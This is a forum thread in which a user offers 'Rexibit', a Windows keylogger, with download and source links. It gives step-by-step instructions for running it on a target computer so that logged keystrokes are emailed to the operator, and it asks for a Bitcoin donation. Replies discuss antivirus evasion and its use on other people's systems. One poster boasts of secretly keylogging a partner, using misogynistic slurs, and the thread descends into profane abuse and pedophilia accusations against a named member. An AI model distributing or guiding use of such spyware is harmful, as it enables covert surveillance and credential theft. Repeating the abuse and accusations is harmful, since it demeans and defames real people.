I developed a simple local keylogger, called "Rexibit".

Here is the .exe: http://tinyurl.com/rexibit
Here is its source code (written in Python): http://pastebin.com/SNZU8QNt

How to use Rexibit?

Step 1: Download Rexibit here: http://tinyurl.com/rexibit
Step 2: Click on the executable you just downloaded and launch Rexibit on the computer you wanna control

Step 3: The program opens a box, which asks you to enter the email address where you wanna receive the key logs. After every 100 keys logged, you will receive an email with the keys logged.
Step 4: If you wanna stop the program, you need to go to Task Manager and stop it.

Note #1: Rexibit is not able to distinguish between uppercase and lowercase

Note #2: Rexibit is not able to distinguish between {1,2,3,4,5,6,7,8,9,0} and {!,",£,$,%,&,/,(,),=}.

Note #3: Rexibit works only on Windows operating systems.

Rexibit software is open source and you are completely free to copy, modify or even sell it. Anyway, if you like it and find it useful, please  make a donation to this address: 18hheTbKzgLXKtEjrdj3Jg6qEWAxbJt8QK

IMPORTANT DISCLAIMER: A Keylogger is a software which could be used both for legal and illegal purposes. I strongly recommend to use it only for legal purposes (e.g. child protection against online pedophiles). Anyway, I decline ANY responsibility about any bad use you make of Rexibit.

Don't think it works that way.

The most important feature of a keylogger is that it does not catch antivirus programs.
Can your keylogger be detected by antivirus?

The problem is that AV detects this.

Antiy-AVL   Trojan/Win32.BTSGeneric   20170130
Invincea   trojan.python.kaazar.a   20170111
Jiangmin   Trojan.Diple.adxg   20170130
Qihoo-360   HEUR/QVM20.1.0000.Malware.Gen   20170130
TheHacker   Trojan/Generik.IWLZKCS   20170129

None of the major AV engines see it so you could get this to work on other people's systems perhaps. Sneaky .. I will not be using it for anything.

Keyloggers are not illegal.
It's like putting a hidden camera on someone.. it dos not make the camera illegal.

For example i once put a keylogger on my own PC before to catch a girl-friend being a little whore trying to setup some cheating on me.
It was her decision to use *MY* computer.. if i want a keylogger on it then so what.. fuck you  Cool

Yup caught the dumb cunt doing all kinds of shit she shouldn't have been doin'.
Should have seen the look on her face when i offered to give her printed transcripts when she did her usual lying.

A keylogger is not a virus.
A keylogger is a KEYLOGGER.

@teeneffigy
Those alerts don't seem to bother me.. they are generic.
A keylogger SHOULD get flagged on VirusTotal etc.
If it don't your AV sucks LOL

Someone needs to grab his source code and compile it then compare it.
Maybe with IDA or OllyDBG or some quick hex comparisons.
I don't have VS installed right now or i would do it.
Nor do i have the motivation to look at this guys source code.

So i can not confirm or deny this guys stuff is malware free..
I would bet he is being legit though.. that is the impression i get.

The user "Spoetnik" replied in a very clever way.

I will quote 2 lines you need to read carefully.

Keyloggers are not illegal.
A keylogger is not a virus.

So, Vod, please remove the negative feedback you gave me, because it's completely unfair.

Stop being so dramatic please... it's not "completely" unfair - just partially.

I'll change my feedback to remove the word virus.  That will remove the partial unfairness.

It may not be illegal, but it's used by perverts and criminals alike.  It is untrustworthy.

WOW Vod actually negged the guy ?
Buddy you have a real problem with that here don't ya ?
He has quite the reputation for that sort of thing.

Google can be used to get child porn.. throw 'em in jail then ?
Life is full of things like that..

Then we have extreme lunatics like VOD who run around screaming his opinions.
the dumb fucking douche negged me for child porn because i mentioned downloading "Porn" at RarBG.
The same porn on EVERY single bloody torrent site that has porn on it across the entire internet on a million web sites.
But in his fucked up head that TRANSLATES into child porn.

Anyway he seems like a religious zealot wacko who thinks his own shit don't stink.
I bet if we dug around we'd see he has skeletons in his own closet.
And as matter of fact read the rating i left on him FIRST..
Seems there is a Pedo report on him on the web.. which is why he negged me afterwards saying i was one.
Copy catting me like a little fucking child.

I think VOD should be banned ..he a fucking moron making a career out of abusing the Trust Rating system to enforce his own personal "beliefs".
And he is out of place on a lawless internet forum with no rules against scamming.
That is like a cop hanging out a criminals-hang-out.com

He has the fucking balls to run around shooting his mouth off ?
Well......

Maybe dumb fuck should run around negging anyone who had anything to do with supporting Dark Markets with Bitcoin.

If he did that he would have to neg THEYMOS  Cheesy

Dark Markets have been heavily used with pedo shit.. and theymos made comments saying Monero was good.
So according to his logic he has a lot of neg's yet to hand out LOL

You should just ignore him he is s mug little douche that thinks he knows things.

Maybe dumb fuck should get on Google (before he reports them for criminal behavior)
First two results say.. Nope.. they are NOT illegal.

I think you did wrong to spoil Boseda his reputation. I'm learning programming and it was interesting for me to study his program. If you think keylogger can cause harm, well everything can as well - you can use an axe to cut your thumb or to build a house. You can use a fire to burn your neighbour or to get some warmth. We all know that many people consider bitcoin to be just hackers' money or ponzi scheme.
I request that Vod reconsider his assessment. This is the forum where many programmers dwell and it's good that some of them shares their knowledge.

Thanks for your opinion, new person.  Can you explain some positive uses of a keylogger?

for security matters for example if you want to track who furtively and maliciously uses your computer on your workplace

I did earlier VOD scroll up..

I am wasting my time though you are a stubborn little wannabee crypto-sheriff here with itchy trigger fingers.

If you are going to beg users based on what you think is illegal then you have a lot of work to do.
Did you ask this user where he is from and what the laws in his country are ?

He posted the source code and does not seem to have any kind of malicious agenda best i can tell.
You negging the guy simply for posting is really unfair.

What if you wanted to use one on your own PC for some reason ?
What if you suspected someone in your house was using your PC with out your permission ?
What if you ran a business and warned staff they would be logged ?
There can be uses for them if you thought about it a bit.
Sure they can be used in a malicious way but i bet many simply want to see how they work and tinker with them.

The one i got years ago was free i got off the Pirate Bay.. it was called "Steel Keylogger"
It was super simple to use and worked really well.. and after a short time it was flagged by AV's.
The distinction is ..hiding it or presenting it.
Sure maybe some countries may consider it illegal to use one against a person with out their knowledge.
But then we get into laws that vary from country to country.
But VOD, you did not ask or get into that did you ?

There is no such thing as "Illegal"
All laws vary on where you are for posting and who the end user is that consume the product etc.

For example the country of Antigua won a court case against the USA and they were awarded damages and the exclusive right to pirate shit.
The US govt never did comply with the court orders of course.
Get it ?

The Pirate Bay may be illegal in Sweden but it may be legal to USE in Antigua.

I don't think you know much about law if i have to point this out.
Hence you should not be handing out negative ratings over "Law" matters.
..especially here of all places where it's a free for all with all kinds of crazy crap going on.

Yup.. just my opinion, but i think it's a pretty good one Wink
Fair is fair guys.

Yup, that's how I [have been] use [-ing] them [for years]. Got'em installed on all my company PC's and my employees actually sign for it...

Really don't understand a negative trust rating on this...  Huh

Vod, a keylogger is not (yet!) a virus... You allready acknowledged that by removing the word "virus" from your negative rating.

Now - I think - it's time to remove the negative rating entirely...  Grin
